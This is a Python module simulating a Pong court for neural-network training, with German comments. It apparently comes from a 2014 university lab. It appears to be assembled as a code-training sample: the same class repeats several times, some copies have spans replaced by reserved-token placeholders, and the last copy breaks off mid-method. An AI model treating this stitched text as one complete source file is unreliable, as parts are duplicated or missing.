self._bathit = [False, False]
self._out = [False, False]
if self.bouncecount > 10:
self.__initvectors()
if self.posVec[1] < 0:
self.posVec[1] *= -1.0
self.dirVec[1] *= -1.0
if self.posVec[1] > self.y_max:
self.posVec[1] = 2 * self.y_max - self.posVec[1]
self.dirVec[1] *= -1.0
self.__tickBounceLeft()
self.__tickBounceRight()
<|reserved_special_token_0|>
def __tickBounceRight(self):
"""Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
if self.posVec[0] > self.x_max:
factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + factor * self.dirVec
self.poi[1] = poi[1]
if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1
] + self.batsize:
self._bathit[1] = True
else:
self.Points[0] += 1
self._out[1] = True
if self.infinite or self._bathit[1]:
self.posVec[0] = 2 * self.x_max - self.posVec[0]
self.dirVec[0] *= -1.0
self.bouncecount += 1
else:
self.__initvectors()
self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
if type(action) == str:
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0:
self.bat[player] = 0.0
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2
if self.bat[player] < 0.0:
self.bat[player] = 0.0
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
def v_getSize(self):
"""
visu-getter
:return float Liste [Float: X, Float: Y] der Spielfeldgröße
"""
return [self.x_max, self.y_max]
def v_getSpeed(self):
"""
visu-getter
:return float Ballgeschwindigkeit
"""
return self.speed
def v_getBatSize(self):
"""
visu-getter
:return float Schlägerlänge (Größe)
"""
return self.batsize
def v_getDirVec(self):
"""
visu-getter
:return float Bewegungsvektor
"""
return self.dirVec
def v_getPosVec(self):
"""
visu-getter
:return float Ortsvektor Liste [Float: X,Float: Y]
"""
return self.posVec
def v_getbat(self):
"""
visu-getter
:return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1
"""
return self.bat
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class court:
<|reserved_special_token_0|>
def __init__(self):
"""
Initialisiert ein court-Objekt.
Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.
:return void
"""
self.x_max = 16.0
self.y_max = 9.0
self.speed = 0.5
self.outputNoiseMax = 0.0
self.infinite = False
self.batsize = 1.0
self.batstep = 0.3
self.posVec = None
self.dirVec = None
self._bathit = [False, False]
self._out = [False, False]
self.Points = [0, 0]
self.poi = [None, None]
self.bat = [self.y_max / 2.0, self.y_max / 2.0]
self.bouncecount = 0
self.__initvectors()
def __initvectors(self):
"""
Initialisiert Anfangs- und Richtungsballvektoren.
Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.
Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.
:return void
"""
rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle
)], [np.sin(rotationAngle), np.cos(rotationAngle)]])
self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
if random.random() > 0.5:
self.dirVec[0] *= -1.0
self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]
)
self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
def __sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, X-Anteil vom Ortsvektor
"""
return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
<|reserved_special_token_0|>
def __sensor_bat(self, player):
"""
Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, Schlägerposition von Spieler[Player]
"""
return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax
def scaled_sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_x())
:return float, skalierter X-Anteil vom Ortsvektor
"""
return self.__sensor_x() / (self.x_max / 2.0) - 1.0
def scaled_sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_y())
:return float, skalierter Y-Anteil vom Ortsvektor
"""
return self.__sensor_y() / (self.y_max / 2.0) - 1.0
def scaled_sensor_bat(self, player):
"""
Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1
mit Rauschen zurück
(Rauschen kommt von __sensor_bat())
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierte Schlägerposition von Spieler[Player]
"""
return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
def hitbat(self, player):
"""
Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]
"""
return self._bathit[player]
def scaled_sensor_err(self, player):
"""
Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.
:pre hitbat(player) or out(player)
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierter Error von Spieler[Player]
"""
return (self.poi[player] - self.__sensor_bat(player)) / self.y_max
def out(self, player):
"""
Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)
"""
return self._out[player]
def getpoints(self, player):
"""
Liefert die Punktanzahl von Spieler[Player]
:param player: Punktzahl von Spieler 0 oder 1
:type player: Int (0 oder 1)
:return int, Punktzahl des Spielers
"""
return self.Points[player]
def tick(self):
"""
Berechnet einen Tick/Spielzug,
hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien
oder die Kollision mit einem Schläger auf False initialisiert, außerdem
die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und
her gespielt haben ohne Tor (Endlosspiel verhindern).
Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen
Bewegungs-/Richtungsvektor ändern muss.
Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder
ob ein Schläger den Ball getroffen hat.
:return void
"""
self.posVec += self.dirVec * self.speed
self._bathit = [False, False]
self._out = [False, False]
if self.bouncecount > 10:
self.__initvectors()
if self.posVec[1] < 0:
self.posVec[1] *= -1.0
self.dirVec[1] *= -1.0
if self.posVec[1] > self.y_max:
self.posVec[1] = 2 * self.y_max - self.posVec[1]
self.dirVec[1] *= -1.0
self.__tickBounceLeft()
self.__tickBounceRight()
<|reserved_special_token_0|>
def __tickBounceRight(self):
"""Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
if self.posVec[0] > self.x_max:
factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + factor * self.dirVec
self.poi[1] = poi[1]
if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1
] + self.batsize:
self._bathit[1] = True
else:
self.Points[0] += 1
self._out[1] = True
if self.infinite or self._bathit[1]:
self.posVec[0] = 2 * self.x_max - self.posVec[0]
self.dirVec[0] *= -1.0
self.bouncecount += 1
else:
self.__initvectors()
self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
if type(action) == str:
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0:
self.bat[player] = 0.0
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2
if self.bat[player] < 0.0:
self.bat[player] = 0.0
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
def v_getSize(self):
"""
visu-getter
:return float Liste [Float: X, Float: Y] der Spielfeldgröße
"""
return [self.x_max, self.y_max]
def v_getSpeed(self):
"""
visu-getter
:return float Ballgeschwindigkeit
"""
return self.speed
def v_getBatSize(self):
"""
visu-getter
:return float Schlägerlänge (Größe)
"""
return self.batsize
def v_getDirVec(self):
"""
visu-getter
:return float Bewegungsvektor
"""
return self.dirVec
def v_getPosVec(self):
"""
visu-getter
:return float Ortsvektor Liste [Float: X,Float: Y]
"""
return self.posVec
def v_getbat(self):
"""
visu-getter
:return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1
"""
return self.bat
def v_getPoint(self):
"""
visu-getter
:return: Liste [X,Y] des Punktestundes für Spieler 0 / 1
"""
return self.Points
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class court:
"""
Objekt, dass das Spielfeld darstellt.
Enthält außerdem Funktionen zur Manipulation von Schlägern und Inspektoren für die Daten:
- Skalierte Daten für die KNNs
- Unskalierte Daten für die Visualisierung
"""
def __init__(self):
"""
Initialisiert ein court-Objekt.
Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.
:return void
"""
self.x_max = 16.0
self.y_max = 9.0
self.speed = 0.5
self.outputNoiseMax = 0.0
self.infinite = False
self.batsize = 1.0
self.batstep = 0.3
self.posVec = None
self.dirVec = None
self._bathit = [False, False]
self._out = [False, False]
self.Points = [0, 0]
self.poi = [None, None]
self.bat = [self.y_max / 2.0, self.y_max / 2.0]
self.bouncecount = 0
self.__initvectors()
def __initvectors(self):
"""
Initialisiert Anfangs- und Richtungsballvektoren.
Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.
Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.
:return void
"""
rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
rotMatrix = np.array([[np.cos(rotationAngle), -np.sin(rotationAngle
)], [np.sin(rotationAngle), np.cos(rotationAngle)]])
self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
if random.random() > 0.5:
self.dirVec[0] *= -1.0
self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()]
)
self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
def __sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, X-Anteil vom Ortsvektor
"""
return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
def __sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, Y-Anteil vom Ortsvektor
"""
return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax
def __sensor_bat(self, player):
"""
Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, Schlägerposition von Spieler[Player]
"""
return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax
def scaled_sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_x())
:return float, skalierter X-Anteil vom Ortsvektor
"""
return self.__sensor_x() / (self.x_max / 2.0) - 1.0
def scaled_sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_y())
:return float, skalierter Y-Anteil vom Ortsvektor
"""
return self.__sensor_y() / (self.y_max / 2.0) - 1.0
def scaled_sensor_bat(self, player):
"""
Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1
mit Rauschen zurück
(Rauschen kommt von __sensor_bat())
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierte Schlägerposition von Spieler[Player]
"""
return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
def hitbat(self, player):
"""
Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]
"""
return self._bathit[player]
def scaled_sensor_err(self, player):
"""
Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.
:pre hitbat(player) or out(player)
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierter Error von Spieler[Player]
"""
return (self.poi[player] - self.__sensor_bat(player)) / self.y_max
def out(self, player):
"""
Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)
"""
return self._out[player]
def getpoints(self, player):
"""
Liefert die Punktanzahl von Spieler[Player]
:param player: Punktzahl von Spieler 0 oder 1
:type player: Int (0 oder 1)
:return int, Punktzahl des Spielers
"""
return self.Points[player]
def tick(self):
"""
Berechnet einen Tick/Spielzug,
hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien
oder die Kollision mit einem Schläger auf False initialisiert, außerdem
die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und
her gespielt haben ohne Tor (Endlosspiel verhindern).
Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen
Bewegungs-/Richtungsvektor ändern muss.
Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder
ob ein Schläger den Ball getroffen hat.
:return void
"""
self.posVec += self.dirVec * self.speed
self._bathit = [False, False]
self._out = [False, False]
if self.bouncecount > 10:
self.__initvectors()
if self.posVec[1] < 0:
self.posVec[1] *= -1.0
self.dirVec[1] *= -1.0
if self.posVec[1] > self.y_max:
self.posVec[1] = 2 * self.y_max - self.posVec[1]
self.dirVec[1] *= -1.0
self.__tickBounceLeft()
self.__tickBounceRight()
def __tickBounceLeft(self):
"""
Checken, ob der Ball links bei Spieler 0 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
if self.posVec[0] < 0:
factor = (0 - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + factor * self.dirVec
self.poi[0] = poi[1]
if poi[1] > self.bat[0] - self.batsize and poi[1] < self.bat[0
] + self.batsize:
self._bathit[0] = True
else:
self.Points[1] += 1
self._out[0] = True
if self.infinite or self._bathit[0]:
self.posVec[0] *= -1.0
self.dirVec[0] *= -1.0
self.bouncecount += 1
else:
self.__initvectors()
self.bouncecount = 0
def __tickBounceRight(self):
"""Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
if self.posVec[0] > self.x_max:
factor = (self.x_max - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + factor * self.dirVec
self.poi[1] = poi[1]
if poi[1] > self.bat[1] - self.batsize and poi[1] < self.bat[1
] + self.batsize:
self._bathit[1] = True
else:
self.Points[0] += 1
self._out[1] = True
if self.infinite or self._bathit[1]:
self.posVec[0] = 2 * self.x_max - self.posVec[0]
self.dirVec[0] *= -1.0
self.bouncecount += 1
else:
self.__initvectors()
self.bouncecount = 0
def move(self, player, action):
"""
Bewegt den Schläger eines Spielers
Diese Funktion ist etwas Trickreich, da als "action"-Parameter sowohl ein String als direkter
up/down-Befehl akzeptiert wird, als auch ein Float der den Schläger direkt setzt.
:param player: Spieler 0 oder 1 (dessen Schläger bewegt werden soll)
:type player: Int
:param action: Wenn str, dann zwischen "d" oder "u" unterscheiden (Schläger hoch oder runter bewegen)
:type action: String
:param action: Wenn float, dann Schläger auf die entsprechende Position setzen
:type action: float
:return: void
"""
if type(action) == str:
if action == 'u':
self.bat[player] += self.batstep
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
if action == 'd':
self.bat[player] -= self.batstep
if self.bat[player] < 0.0:
self.bat[player] = 0.0
elif type(action) == float:
self.bat[player] = (action + 1) * self.y_max / 2
if self.bat[player] < 0.0:
self.bat[player] = 0.0
if self.bat[player] > self.y_max:
self.bat[player] = self.y_max
def v_getSize(self):
"""
visu-getter
:return float Liste [Float: X, Float: Y] der Spielfeldgröße
"""
return [self.x_max, self.y_max]
def v_getSpeed(self):
"""
visu-getter
:return float Ballgeschwindigkeit
"""
return self.speed
def v_getBatSize(self):
"""
visu-getter
:return float Schlägerlänge (Größe)
"""
return self.batsize
def v_getDirVec(self):
"""
visu-getter
:return float Bewegungsvektor
"""
return self.dirVec
def v_getPosVec(self):
"""
visu-getter
:return float Ortsvektor Liste [Float: X,Float: Y]
"""
return self.posVec
def v_getbat(self):
"""
visu-getter
:return: Liste [batSpieler0, batSpieler1] -> Position des Schlägermittelpunktes von Spieler 0 / 1
"""
return self.bat
def v_getPoint(self):
"""
visu-getter
:return: Liste [X,Y] des Punktestundes für Spieler 0 / 1
"""
return self.Points
<|reserved_special_token_1|>
#!/usr/bin/env python3.4
# -*- coding: utf-8 -*-
"""
Das Pong-Spielfeld wird simuliert.
Court moduliert ein anpassbares Spielfeld für Pong mit einem standardmäßigen Seitenverhältnis von 16:9.
Jenes Spielfeld verfügt über einen Ball und zwei Schläger, jeweils links und rechts am Spielfeldrand,
sowie einen Punktestand für beide Spieler (0 und 1).
Spieler 0 spielt auf der linken Hälfte, Spieler 1 auf der rechten Hälfte.
Zwecks einfacher Adaptierung an Folgesysteme ist die Schnittstelle mit normierten Ein- und Ausgabewerten versehen,
welches alle Daten auf ein Interval [-1.0, 1.0] normiert.
"""
__author__ = "Daniel Speck, Florian Kock"
__copyright__ = "Copyright 2014, Praktikum Neuronale Netze"
__license__ = "GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Daniel Speck, Florian Kock"
__email__ = "2speck@informatik.uni-hamburg.de, 2kock@informatik.uni-hamburg.de"
__status__ = "Development"
import numpy as np
import random
class court:
"""
Objekt, dass das Spielfeld darstellt.
Enthält außerdem Funktionen zur Manipulation von Schlägern und Inspektoren für die Daten:
- Skalierte Daten für die KNNs
- Unskalierte Daten für die Visualisierung
"""
def __init__(self):
"""
Initialisiert ein court-Objekt.
Hierzu zählen Spielfeld, Spieler sowie die Startposition des Balles.
:return void
"""
##############################
### veränderbare Parameter ###
##############################
# Größe des Spielfeldes (standardmäßig 16 zu 9; hat bei Tests bewährt)
self.x_max = 16.0
self.y_max = 9.0
# Ballgeschwindigkeit
# (Faktor für den Richtungs-/Bewegungsvektor / die Ballgeschwindigkeit;
# NeuerOrtsvektor = AlterOrtsvektor + Richtungs-/Bewegungsvektor * Ballgeschwindigkeitsfaktor)
self.speed = 0.5
# Rauschen auf die Ballposition hinzufügen (Faktor)
self.outputNoiseMax = 0.0 # Achtung: Noch nie mit Rauschen getestet! Sollte bei 0 bleiben!
# Soll der Ball aus dem Spielfeld fliegen können oder ewig hin und her springen?
# True -> Ball fliegt ewig hin und her, wird bei einem Tor nicht auf Startposition zurückgesetzt
# False -> Ball wird bei Tor zurückgesetzt auf die Startposition
self.infinite = False
# Größe der Schläger von Spieler 0 und 1
# (von der Mitte zum Ende, d.h hier die halbe Länge der gewünschten Gesamtlänge eintragen!)
self.batsize = 1.0
# Im Befehlsmodus kann der Schläger mit den Befehlen 'u' und 'd' bewegt werden.
# Hier wird die dazugehörige Sprungweite des Schlägers angegeben.
self.batstep = 0.3
############################################
### Initialisierungen (nicht verändern!) ###
############################################
# Ortsvektor des Balles (Bezugspunkt ist [0,0])
self.posVec = None
# Richtungs-/Bewegungsvektor des Balles (Einheitsvektor)
self.dirVec = None
# Binärer Speicher, ob der Ball den einen Schläger getroffen hat [links, rechts]
self._bathit = [False, False]
# Binärer Speicher, ob der Ball die Linie geflogen ist [links, rechts]
self._out = [False, False]
# Punktestand [Spieler 0, Spieler 1]
self.Points = [0, 0]
# Der "Einschlagspunkt" des Balles auf der (Toraus-)Linie, wird erst nach einem Aufprall
# mit konkreten Werten belegt und dann zur Fehlerberechnung genutzt (supervised learning).
self.poi = [None, None]
# Initiale Schlägerpositionen der Spieler auf ihren Linien.
# [SchlängerLinks, SchlägerRechts]
# Positionsänderungen sind somit, wie in Pong üblich, nur auf der Y-Achse möglich.
self.bat = [self.y_max / 2.0, self.y_max / 2.0]
# Zählt die Schlägertreffer (Kollisionen des Balles mit einem Schläger).
# Die KNNs sollen unterschiedliche Winkel lernen (der Winkel wird immer zufallsinitialisiert),
# bei ausreichender Lerndauer bzw. stark minimiertem Fehler jedoch sind die KNNs manchmal auf
# einigen Winkeln derart talentiert, dass der Ball nie mehr über die Torlinie gehen würde.
# Um ein solches "Endlosspiel" zu verhindern, wird der Ball nach 10 Treffern resettet,
# das Spielfeld also zurückgesetzt mit einer initialen Ballposition auf der Spielfeldmitte und
# neuem, zufallskalkuliertem Winkel.
self.bouncecount = 0
# Startvorbereitung
# Initialisiert das erste Mal den Ortsvektor und Bewegungs-/Richtungsvektor
self.__initvectors()
def __initvectors(self):
"""
Initialisiert Anfangs- und Richtungsballvektoren.
Irgendwo in der Mitte auf der Y-Achse und mit einem belibigen Startwinkel.
Der Startwinkel ist stets größergleich -45 Grad sowie kleinergleich +45 Grad von der Horizontalen aus gesehen.
:return void
"""
# Richtungsvektor erzeugen
# Zufallswinkel im Bogenmaß generieren
# 2 Pi entsprechen dem vollen Einheitskreis, also 360°
# [-Pi/4, +Pi/4] entspricht einem Interval von [-45°, +45°]
# Dieses Interval hat sich bewährt, da zu spitze den Lerneffekt und vor allem die Lerndauer
# negativ beeinflussen.
rotationAngle = np.random.uniform(-np.pi / 4, np.pi / 4)
# Aus dem Zufallswinkel eine entsprechende Rotationsmatrix generieren
rotMatrix = np.array([
[np.cos(rotationAngle), -np.sin(rotationAngle)],
[np.sin(rotationAngle), np.cos(rotationAngle)]
])
# Rotationsmatrix auf einen Einheitsvektor (horizontale Ausrichtung) anwenden
self.dirVec = np.dot(rotMatrix, np.array([1, 0]))
# Zufällig entscheiden, ob der Ball nach links (zu Player 0) oder rechts (zu Player 1) startet.
if random.random() > 0.5:
self.dirVec[0] *= -1.0 # x-Komponente des Richtungs-/Bewegungsvektors wird an der Y-Achse gespiegelt
# Ortsvektor erzeugen
# Start irgendowo auf der Mittellinie
# (x-Koordinate ist also fixiert auf die Mittellinie, y-Koordinate zufällig)
self.posVec = np.array([self.x_max / 2.0, self.y_max * random.random()])
# Rücksetzen der Anzahl der Schlägertreffer (__init__)
self.bouncecount = 0
def _incrpoints(self, player):
"""
Erhöht den Punktestand für einen Spieler[Player]
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return void
"""
self.Points[player] += 1
def __sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, X-Anteil vom Ortsvektor
"""
return self.posVec[0] + (random.random() - 0.5) * self.outputNoiseMax
def __sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles mit Rauschen zurück
:return float, Y-Anteil vom Ortsvektor
"""
return self.posVec[1] + (random.random() - 0.5) * self.outputNoiseMax
def __sensor_bat(self, player):
"""
Gibt die Position des Schlägers auf der Y-Achse von Spieler[Player] mit Rauschen zurück
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, Schlägerposition von Spieler[Player]
"""
return self.bat[player] + (random.random() - 0.5) * self.outputNoiseMax
def scaled_sensor_x(self):
"""
Gibt den X-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_x())
:return float, skalierter X-Anteil vom Ortsvektor
"""
return self.__sensor_x() / (self.x_max / 2.0) - 1.0
def scaled_sensor_y(self):
"""
Gibt den Y-Anteil des Ortsvektors des Balles skaliert von -1 bis +1 mit Rauschen zurück
(Rauschen kommt von __sensor_y())
:return float, skalierter Y-Anteil vom Ortsvektor
"""
return self.__sensor_y() / (self.y_max / 2.0) - 1.0
def scaled_sensor_bat(self, player):
"""
Gibt die Position des Schlägers von Spieler[Player] skaliert von -1 bis +1
mit Rauschen zurück
(Rauschen kommt von __sensor_bat())
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierte Schlägerposition von Spieler[Player]
"""
return self.__sensor_bat(player) / (self.y_max / 2.0) - 1.0
def hitbat(self, player):
"""
Gibt an, ob der Schläger von Spieler[Player] getroffen wurde oder nicht im aktuellen Tick/Spielzug.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Treffer (True) oder kein Treffer (False) vom Schläger von Spieler[Player]
"""
return self._bathit[player]
def scaled_sensor_err(self, player):
"""
Gibt den Fehler von Spieler[Player] skaliert von -1 bis +1 zurück.
:pre hitbat(player) or out(player)
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return float, skalierter Error von Spieler[Player]
"""
return (self.poi[player] - self.__sensor_bat(player) ) / self.y_max
def out(self, player):
"""
Gibt an, ob der Ball die Linie von Spieler[Player] überschritten hat oder nicht.
:param player: Spieler 0 oder 1
:type player: Int (0 oder 1)
:return Bool, Ball hat die Linie von Spieler[Player] überschritten (True) oder nicht überschritten (False)
"""
return self._out[player]
def getpoints(self, player):
"""
Liefert die Punktanzahl von Spieler[Player]
:param player: Punktzahl von Spieler 0 oder 1
:type player: Int (0 oder 1)
:return int, Punktzahl des Spielers
"""
return self.Points[player]
def tick(self):
"""
Berechnet einen Tick/Spielzug,
hierbei wird der Ball bewegt, die Überschreitung einer der Torauslinien
oder die Kollision mit einem Schläger auf False initialisiert, außerdem
die Ballposition zurückgesetzt, falls die Spieler den Ball zu oft hin und
her gespielt haben ohne Tor (Endlosspiel verhindern).
Ebenso wird überprüft, ob der Ball auf eine Bande getroffen ist und seinen
Bewegungs-/Richtungsvektor ändern muss.
Zum Schluss wird evaluiert, ob der Ball über die Torauslinie geflogen oder
ob ein Schläger den Ball getroffen hat.
:return void
"""
#########################
### Initialisierungen ###
#########################
# Setzt den Ball eine Position weiter.
# Die Schrittweite wird durch den Faktor self.speed gesetzt, der den Einheitsvektor dirVec skaliert
self.posVec += self.dirVec * self.speed
# Hat der Schläger den Ball getroffen?
# bathit[0] -> linker Schläger
# bathit[1] -> rechter Schläger
self._bathit = [False, False]
self._out = [False, False]
###################
### Anweisungen ###
###################
# Falls 10 oder mehr Treffer also jeder mindestens 5x getroffen hat, dann wird abgebrochen
# und neu gestartet, damit die aktuelle Endlosschleife unterbrochen wird. Hier würde das KNN
# sonst nichts Neues mehr lernen.
if self.bouncecount > 10:
self.__initvectors()
# Abprallen an der Unterseite bei Y = 0
if self.posVec[1] < 0:
self.posVec[1] *= -1.0
self.dirVec[1] *= -1.0
# Abprallen an der Oberseite bei Y = y_max (hier vermutlich 9)
if self.posVec[1] > self.y_max:
self.posVec[1] = 2 * self.y_max - self.posVec[1]
self.dirVec[1] *= -1.0
# Prüfe auf Treffer auf der linken Seite (Spieler 0)
self.__tickBounceLeft()
# Prüfe auf Treffer auf der rechten Seite (Spieler 1)
self.__tickBounceRight()
def __tickBounceLeft(self):
"""
Checken, ob der Ball links bei Spieler 0 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
# Wenn der Ortsvektor kleiner ist als 0, dann hat er die Torauslinie von Spieler 0 überschritten
if self.posVec[0] < 0:
# Berechne den theoretischen, genauen Aufprallpunkt (poi: PointOfImpact)
# auf der Linie von Spieler 0 (Y = 0)
factor = (0 - self.posVec[0]) / self.dirVec[0]
poi = self.posVec + (factor * self.dirVec)
self.poi[0] = poi[1] # Speichere diesen für eine evtl. spätere Nutzung von z.B. scaled_sensor_err(player)
# Prüfe ob der Ball dann den Schläger getroffen hätte, wenn ja, dann...
if (poi[1] > self.bat[0] - self.batsize) and (poi[1] < self.bat[0] + self.batsize):
self._bathit[0] = True # ... vermerke dies für z.B. hitbat(player)
else: # wenn jedoch nicht, dann...
self.Points[1] += 1 # ... Punkte von Spieler 1 (rechts) erhöhen
self._out[0] = True # und merken, das der Ball außerhalb des Spielfelds
# war, z.B. für out(player)
# Ball abprallen lassen, falls:
# -> Infinite true ist, also das Spiel endlos dauern soll ohne Zurücksetzen der Ballposition
# -> Der Schläger den Ball getroffen hat
if self.infinite or self._bathit[0]:
self.posVec[0] *= -1.0 # Einfallswinklel = Ausfallswinkel
self.dirVec[0] *= -1.0
self.bouncecount += 1 # Treffer vermerken, um bei zu vielen Treffern dieses neu zu starten
else:
self.__initvectors() # Kein Treffer, somit das Spiel neu Initialisieren.
self.bouncecount = 0
def __tickBounceRight(self):
"""Checken, ob der Ball rechts bei Spieler 1 aus dem Spielfeld fliegt oder vom Schläger getroffen wird
:return: void
"""
